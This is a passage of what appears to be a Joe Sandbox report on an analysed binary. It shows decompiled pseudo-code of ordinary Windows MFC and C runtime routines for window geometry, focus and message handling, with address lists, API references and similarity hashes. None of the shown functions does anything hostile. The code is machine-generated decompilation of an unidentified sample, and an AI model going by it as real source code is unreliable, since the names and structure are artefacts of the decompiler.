                  0x004251cc
                  0x004251d1
                  0x004251eb
                  0x004251ee
                  0x004251f1
                  0x004251f7
                  0x004251f8
                  0x004251f9
                  0x004251fb
                  0x004251fd
                  0x00425200
                  0x00425202
                  0x0042520b
                  0x00425204
                  0x00425204
                  0x00425204
                  0x00000000
                  0x00425202
                  0x004251d4
                  0x004251d5
                  0x0042526a
                  0x0042526c
                  0x00425272
                  0x0042527b
                  0x00425274
                  0x00425274
                  0x00425274
                  0x00000000
                  0x00425282
                  0x004251dd
                  0x00000000
                  0x00000000
                  0x004251e3
                  0x00000000
                  0x004251e3
                  0x00425260
                  0x00425263
                  0x00000000
                  0x00425263

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Capture$Message$Dispatch
                  • String ID:
                  • API String ID: 3654672037-0
                  • Opcode ID: 230859865490aac894e54a27b38a5e0f56adc41e66776a2f96609ea66a640a14
                  • Instruction ID: d206bd30ddddd924d114909a91c140b9e49460e59ca5c144d558be76b45dd6da
                  • Opcode Fuzzy Hash: 230859865490aac894e54a27b38a5e0f56adc41e66776a2f96609ea66a640a14
                  • Instruction Fuzzy Hash: B831B731700925DBDB24ABF5A84997F76A8EB80344F90486FE442E22D1CA3C9C41DE7A
                  Uniqueness

                  Uniqueness Score: 1.31%

                  Function 0041A680, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041A680(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E0042922B(E00439716, __ebx, __edi, __esi);
				_t78 = __ecx;
				E0041478D(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				E004144FC(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E00413FFC(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x150))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E00414043(_t79 - 0x40, _t79 - 0x1c);
				SendMessageW( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x158))(_t79 - 0x40, _t79 - 0x1c);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E00429303(E004147E1(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}






                  0x0041a680
                  0x004234b8
                  0x004234bd
                  0x004234c3
                  0x004234c8
                  0x004234d3
                  0x004234e0
                  0x004234ec
                  0x00423507
                  0x00423510
                  0x00423525
                  0x00423533
                  0x00423540
                  0x0042354f
                  0x00423561
                  0x00423567
                  0x00423578

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004234B8
                    • Part of subcall function 0041478D: __EH_prolog3.LIBCMT ref: 00414794
                    • Part of subcall function 0041478D: GetWindowDC.USER32(00000000), ref: 004147C0
                  • GetClientRect.USER32(?,?), ref: 004234D3
                  • GetWindowRect.USER32(?,?), ref: 004234E0
                    • Part of subcall function 004144FC: ScreenToClient.USER32(?,00000000), ref: 0041450D
                    • Part of subcall function 004144FC: ScreenToClient.USER32(?,00000008), ref: 0041451A
                  • OffsetRect.USER32(?,?,?), ref: 00423507
                    • Part of subcall function 00413FFC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00414025
                    • Part of subcall function 00413FFC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041403A
                  • OffsetRect.USER32(?,?,?), ref: 00423525
                    • Part of subcall function 00414043: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041406C
                    • Part of subcall function 00414043: IntersectClipRect.GDI32(?,?,?,?,?), ref: 00414081
                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 0042354F
                    • Part of subcall function 004147E1: __EH_prolog3.LIBCMT ref: 004147E8
                    • Part of subcall function 004147E1: ReleaseDC.USER32(?,00000000), ref: 00414805
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                  • String ID:
                  • API String ID: 2952362992-0
                  • Opcode ID: 6fed628b89d2a2e1b305be27e03326f1b10bfb88e14ea84e6eb177eacea98780
                  • Instruction ID: 8311e8cd8048544a21e1c01b20f670841aaf83e46b2aef2157f9198ec98204d3
                  • Opcode Fuzzy Hash: 6fed628b89d2a2e1b305be27e03326f1b10bfb88e14ea84e6eb177eacea98780
                  • Instruction Fuzzy Hash: 7621EA72D1001AEFCF19EB94DC59DEEB3B8FF58314F00411AF552A71A1DB686A06CB64
                  Uniqueness

                  Uniqueness Score: 3.15%

                  Function 00413A14, Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00413A14(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongW(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E004139CF();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E0040CC4F();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}








                  0x00413a21
                  0x00413a27
                  0x00413a44
                  0x00413a52
                  0x00413a5d
                  0x00413a5d
                  0x00413a5f
                  0x00413a63
                  0x00413a6e
                  0x00413a72
                  0x00413a7f
                  0x00413a7f
                  0x00413a81
                  0x00413a86
                  0x00413a8a
                  0x00413aa8
                  0x00413a9b
                  0x00413a9e
                  0x00413aa0
                  0x00413aa0
                  0x00413a8a
                  0x00413ab1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413a65
                  0x00413a65
                  0x00413a66
                  0x00413a68
                  0x00413a6a
                  0x00000000
                  0x00413a65
                  0x00413a57
                  0x00413a59
                  0x00413a5b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413a5b
                  0x00413a29
                  0x00413a30
                  0x00413a3f
                  0x00413a3f
                  0x00000000
                  0x00413a3f
                  0x00413a32
                  0x00413a39
                  0x00000000
                  0x00000000
                  0x00413a3b
                  0x00000000

                  APIs
                  • GetWindowLongW.USER32(?,000000F0), ref: 00413A47
                  • GetParent.USER32(?), ref: 00413A55
                  • GetParent.USER32(?), ref: 00413A68
                  • GetLastActivePopup.USER32(?), ref: 00413A79
                  • IsWindowEnabled.USER32(?), ref: 00413A8D
                  • EnableWindow.USER32(?,00000000), ref: 00413AA0
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                  • String ID:
                  • API String ID: 670545878-0
                  • Opcode ID: 4dfcf502996e90a489658d693e8decf38d947f26377f3984b9c78d516146826b
                  • Instruction ID: 962a8f2f463d23200e5a66e4a0fa3782d3095af7e360e77f51392ae02e40c260
                  • Opcode Fuzzy Hash: 4dfcf502996e90a489658d693e8decf38d947f26377f3984b9c78d516146826b
                  • Instruction Fuzzy Hash: AA119D32A41221A7DB215E699844BABB69C5F55BE3F150126EC88A7300D768DE8142DE
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Function 00415740, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E00415740(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t17;
				signed int _t22;
				void* _t28;
				struct HWND__* _t32;
				void* _t34;

				_t30 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				_t17 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t17;
				_t36 = _t32;
				if(_t32 == 0) {
					L14:
					return _t17;
				} else {
					_t28 = ShowWindow;
					_push(_t34);
					do {
						_t34 = E0040E23A(_t28, _t30, _t32, _t34, _t36, _t32);
						if(_t34 != 0) {
							_t20 =  *((intOrPtr*)(_v8 + 0x20));
							if( *((intOrPtr*)(_v8 + 0x20)) != _t32 && E004156A7(_t20, _t32) != 0) {
								_t22 = GetWindowLongW(_t32, 0xfffffff0);
								if(_a4 != 0) {
									__eflags = _t22 & 0x18000000;
									if(__eflags == 0) {
										__eflags =  *(_t34 + 0x3c) & 0x00000002;
										if(__eflags != 0) {
											__eflags =  *(_v8 + 0xb4);
											if(__eflags == 0) {
												ShowWindow(_t32, 4);
												_t14 = _t34 + 0x3c;
												 *_t14 =  *(_t34 + 0x3c) & 0xfffffffd;
												__eflags =  *_t14;
											}
										}
									}
								} else {
									if((_t22 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
					} while (_t32 != 0);
					goto L14;
				}
			}












                  0x00415740
                  0x00415745
                  0x00415749
                  0x00415753
                  0x00415759
                  0x0041575b
                  0x0041575d
                  0x004157e5
                  0x004157e7
                  0x00415763
                  0x00415764
                  0x0041576a
                  0x0041576b
                  0x00415771
                  0x00415775
                  0x0041577a
                  0x0041577f
                  0x0041578f
                  0x00415799
                  0x004157b2
                  0x004157b7
                  0x004157b9
                  0x004157bd
                  0x004157c2
                  0x004157c9
                  0x004157ce
                  0x004157d0
                  0x004157d0
                  0x004157d0
                  0x004157d0
                  0x004157c9
                  0x004157bd
                  0x0041579b
                  0x004157a5
                  0x004157aa
                  0x004157ac
                  0x004157ac
                  0x004157a5
                  0x00415799
                  0x0041577f
                  0x004157d7
                  0x004157dd
                  0x004157df
                  0x00000000
                  0x0041576b

                  APIs
                  • GetDesktopWindow.USER32 ref: 0041574C
                  • GetWindow.USER32(00000000), ref: 00415753
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041578F
                  • ShowWindow.USER32(00000000,00000000), ref: 004157AA
                  • ShowWindow.USER32(00000000,00000004), ref: 004157CE
                  • GetWindow.USER32(00000000,00000002), ref: 004157D7
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Show$DesktopLong
                  • String ID:
                  • API String ID: 3178490500-0
                  • Opcode ID: 42ccfa103ddddd6394b549e94fbee18f1e8098f60ee6e9f052897bb16f7a7c84
                  • Instruction ID: fdba1fe63c8e3a1469863332e3a5b12d4b229c8bf81592b87fbc10e913df84e1
                  • Opcode Fuzzy Hash: 42ccfa103ddddd6394b549e94fbee18f1e8098f60ee6e9f052897bb16f7a7c84
                  • Instruction Fuzzy Hash: AC110431100B04EBD7219725CC8EFEF76AA9BC1724F24011AF4619A6C1CBBCDC808B19
                  Uniqueness

                  Uniqueness Score: 0.53%

                  Function 00424B98, Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00424B98(void* __ecx) {
				struct tagMSG _v32;
				void* __ebx;
				int _t20;
				intOrPtr _t23;
				int _t30;
				intOrPtr _t31;
				void* _t32;
				void* _t33;
				void* _t36;
				void* _t38;

				_t32 = PeekMessageW;
				_t38 = __ecx;
				while(PeekMessageW( &_v32, 0, 0xf, 0xf, 0) != 0) {
					_t20 = GetMessageW( &_v32, 0, 0xf, 0xf);
					if(_t20 != 0) {
						DispatchMessageW( &_v32);
						continue;
					}
					return _t20;
				}
				_t23 =  *((intOrPtr*)(_t38 + 0x68));
				 *((intOrPtr*)(_t38 + 0x70)) =  *((intOrPtr*)(_t23 + 0x88));
				 *(_t38 + 0x78) =  *(_t23 + 0x84) & 0x0000f000;
				SetRectEmpty(_t38 + 0xc);
				 *((intOrPtr*)(_t38 + 0x20)) = 0;
				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
				 *((intOrPtr*)(_t38 + 0x24)) = 0;
				 *((intOrPtr*)(_t38 + 0x7c)) = 0;
				 *((intOrPtr*)(_t38 + 0x80)) = 0;
				_t33 = E0040E20E(_t32,  *((intOrPtr*)(_t23 + 0x88)), GetDesktopWindow());
				_t30 = LockWindowUpdate( *(_t33 + 0x20));
				_t36 = _t33;
				if(_t30 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(0);
				_t31 = E004249CB(_t36);
				 *((intOrPtr*)(_t38 + 0x84)) = _t31;
				return _t31;
			}













                  0x00424ba1
                  0x00424ba9
                  0x00424bd0
                  0x00424bb8
                  0x00424bc0
                  0x00424bca
                  0x00000000
                  0x00424bca
                  0x00424c4c
                  0x00424c4c
                  0x00424be0
                  0x00424be9
                  0x00424bf7
                  0x00424bfe
                  0x00424c04
                  0x00424c07
                  0x00424c0a
                  0x00424c0d
                  0x00424c10
                  0x00424c22
                  0x00424c27
                  0x00424c2d
                  0x00424c31
                  0x00424c3a
                  0x00424c33
                  0x00424c33
                  0x00424c33
                  0x00424c3c
                  0x00424c3d
                  0x00424c42
                  0x00000000

                  APIs
                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 00424BB8
                  • DispatchMessageW.USER32(?), ref: 00424BCA
                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00424BDA
                  • SetRectEmpty.USER32(?), ref: 00424BFE
                  • GetDesktopWindow.USER32 ref: 00424C16
                  • LockWindowUpdate.USER32(?), ref: 00424C27
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                  • String ID:
                  • API String ID: 1192691108-0
                  • Opcode ID: 825ef4014efc3c32ec1326387a4c18007ca9f1aa02beba784d9558f894ae5d38
                  • Instruction ID: 47004bcab078acc9ae84c225d39a4c5588a5ee76e5babfe7bd05c2ff0d3eab4e
                  • Opcode Fuzzy Hash: 825ef4014efc3c32ec1326387a4c18007ca9f1aa02beba784d9558f894ae5d38
                  • Instruction Fuzzy Hash: E2116072A407019BD7209FA6DC49F67BBECFB84700F00453AA696D7691DB78E4019B18
                  Uniqueness

                  Uniqueness Score: 8.94%

                  Function 004183AB, Relevance: 9.1, APIs: 6, Instructions: 59windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 60%
                  			E004183AB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				long _t31;
				void* _t33;
				void* _t38;
				void* _t58;
				void* _t59;

				_push(0x18);
				E0042925E(E00438FFC, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t59 - 0x1c)) = __ecx;
				_push(_t59 - 0x18);
				_push(_t59 - 0x20);
				_push( *((intOrPtr*)(_t59 + 0xc)));
				_push(0x3e8);
				L00437B5A();
				_t28 = GlobalLock( *(_t59 - 0x18));
				E00404820(_t59 - 0x14);
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				 *(_t59 - 4) = 1;
				E00405C40(_t59 - 0x14, _t28);
				_t31 = GlobalUnlock( *(_t59 - 0x18));
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				_push( *(_t59 - 0x18));
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push( *((intOrPtr*)(_t59 + 0xc)));
				L00437B54();
				_t54 =  *((intOrPtr*)(_t59 - 0x1c));
				PostMessageW( *(_t59 + 8), 0x3e4,  *( *((intOrPtr*)(_t59 - 0x1c)) + 0x20), _t31);
				_t33 = E00411E53( *((intOrPtr*)(_t59 - 0x1c)));
				_t61 = _t33;
				if(_t33 != 0) {
					_t58 = E00412509(_t59 - 0x14);
					_t38 = E0042083D(__ebx, _t54, _t58, _t61);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 + 4)))) + 0xa0))(_t58);
					E0040E100(__ebx, _t59 - 0x14, _t54, 0xffffffff);
				}
				E004055F0( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0);
				return E00429303(0);
			}









                  0x004183ab
                  0x004183b2
                  0x004183b7
                  0x004183bd
                  0x004183c1
                  0x004183c2
                  0x004183c5
                  0x004183ca
                  0x004183d2
                  0x004183dd
                  0x004183e2
                  0x004183ea
                  0x004183ee
                  0x004183f6
                  0x004183fc
                  0x00418400
                  0x00418408
                  0x0041840d
                  0x0041840e
                  0x00418413
                  0x00418416
                  0x0041841b
                  0x00418426
                  0x0041842e
                  0x00418433
                  0x00418435
                  0x0041843f
                  0x00418441
                  0x0041844e
                  0x00418459
                  0x00418459
                  0x00418464
                  0x00418470

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004183B2
                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004183CA
                  • GlobalLock.KERNEL32(?,00000018), ref: 004183D2
                  • GlobalUnlock.KERNEL32(?,00000000), ref: 004183F6
                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 00418416
                  • PostMessageW.USER32(?,000003E4,?,00000000), ref: 00418426
                    • Part of subcall function 00411E53: IsWindowEnabled.USER32(?), ref: 00411E5C
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
                  • String ID:
                  • API String ID: 4187826474-0
                  • Opcode ID: 6e97d9d29cc3077be3e35f1e3c4f29e22ef27d8bf0eb7783085607a00251b49a
                  • Instruction ID: 46df5594f5924960c615bc6a2c4168bc68382a86defef996bbd4db92b267d146
                  • Opcode Fuzzy Hash: 6e97d9d29cc3077be3e35f1e3c4f29e22ef27d8bf0eb7783085607a00251b49a
                  • Instruction Fuzzy Hash: E6119031900119ABCF01EBE1CD4AAEEBB75AF04315F14416AB515B72E1DB389A10CBA9
                  Uniqueness

                  Uniqueness Score: 1.31%

                  Function 00420B28, Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00420B28(struct HWND__* _a4) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t8;
				void* _t10;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t8 = _a4;
					if(_t11 == _t8) {
						L10:
						return _t3;
					}
					if(E00420A0C(_t8, _t10, _t11, _t11, 3) != 0) {
						L5:
						if(_t8 == 0 || (GetWindowLongW(_t8, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageW(_t11, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t8);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t11);
					_t11 = _t3;
					if(_t11 == _t8) {
						goto L9;
					}
					_t3 = E00420A0C(_t8, _t10, _t11, _t11, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}










                  0x00420b2e
                  0x00420b34
                  0x00420b38
                  0x00420b3b
                  0x00420b40
                  0x00420b9e
                  0x00000000
                  0x00420b9e
                  0x00420b53
                  0x00420b6a
                  0x00420b6c
                  0x00420b8d
                  0x00420b97
                  0x00000000
                  0x00420b7e
                  0x00420b7f
                  0x00420b83
                  0x00420b8b
                  0x00420b9d
                  0x00000000
                  0x00420b9d
                  0x00000000
                  0x00420b8b
                  0x00420b6c
                  0x00420b56
                  0x00420b58
                  0x00420b5c
                  0x00000000
                  0x00000000
                  0x00420b61
                  0x00420b68
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420b68
                  0x00420ba1

                  APIs
                  • GetFocus.USER32 ref: 00420B2E
                  • GetParent.USER32(00000000), ref: 00420B56
                    • Part of subcall function 00420A0C: GetWindowLongW.USER32(00000000,000000F0), ref: 00420A2D
                    • Part of subcall function 00420A0C: GetClassNameW.USER32(00000000,?,0000000A), ref: 00420A42
                  • GetWindowLongW.USER32(?,000000F0), ref: 00420B71
                  • GetParent.USER32(?), ref: 00420B7F
                  • GetDesktopWindow.USER32 ref: 00420B83
                  • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 00420B97
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                  • String ID:
                  • API String ID: 3020784601-0
                  • Opcode ID: 35728d4f1958bfb7fa184421d5793c1d795404e46095cd8f19a3087524625743
                  • Instruction ID: 83d8dd98347f53bbff70830e4d75b1cb1ff8183ab09140bca182f1a787f1b109
                  • Opcode Fuzzy Hash: 35728d4f1958bfb7fa184421d5793c1d795404e46095cd8f19a3087524625743
                  • Instruction Fuzzy Hash: 9F01D63234032923E63017A67C88F2F3ADD5B91B64F95013BF905A3293CE6CAC01456D
                  Uniqueness

                  Uniqueness Score: 0.45%

                  Function 0042CA56, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0042CA56(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x447d08);
				E00429338(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00427CFA(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0042C35A(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0042C35A(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0042C35A(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0042C35A(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00427D9F(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0042CB7C(_t48, _t53, _t55, _t57, _t61);
				return E0042937D( *((intOrPtr*)(_t58 - 0x1c)));
			}







                  0x0042ca56
                  0x0042ca56
                  0x0042ca56
                  0x0042ca58
                  0x0042ca5d
                  0x0042ca62
                  0x0042ca64
                  0x0042ca67
                  0x0042ca6a
                  0x0042ca6d
                  0x0042ca74
                  0x0042ca85
                  0x0042ca93
                  0x0042caa1
                  0x0042caa9
                  0x0042cab7
                  0x0042cabd
                  0x0042cac4
                  0x0042cac7
                  0x0042cadd
                  0x0042cae0
                  0x0042cb55
                  0x0042cb5c
                  0x0042cb63
                  0x0042cb70

                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 0042CA7E
                    • Part of subcall function 00427CFA: __getptd.LIBCMT ref: 00427D08
                    • Part of subcall function 00427CFA: __getptd.LIBCMT ref: 00427D16
                  • __getptd.LIBCMT ref: 0042CA88
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042CA96
                  • __getptd.LIBCMT ref: 0042CAA4
                  • __getptd.LIBCMT ref: 0042CAAF
                  • _CallCatchBlock2.LIBCMT ref: 0042CAD5
                    • Part of subcall function 00427D9F: __CallSettingFrame@12.LIBCMT ref: 00427DEB
                    • Part of subcall function 0042CB7C: __getptd.LIBCMT ref: 0042CB8B
                    • Part of subcall function 0042CB7C: __getptd.LIBCMT ref: 0042CB99
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
